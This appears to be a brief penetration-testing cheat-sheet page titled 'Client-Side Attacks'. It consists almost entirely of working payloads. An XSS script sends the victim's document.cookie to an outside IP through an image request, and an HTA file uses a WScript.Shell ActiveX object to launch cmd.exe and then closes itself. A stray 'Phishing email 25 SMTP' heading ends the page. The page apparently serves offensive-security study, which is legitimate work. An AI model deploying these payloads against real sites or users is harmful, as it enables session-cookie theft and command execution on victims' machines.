Client-Side Attacks
Cross-Site Scripting XSS
<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>HTA Exploit
<html>
<head>
<script>
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>
self.close();
</script>
</body>
</html>


Phishing email 25 SMTP
Last updated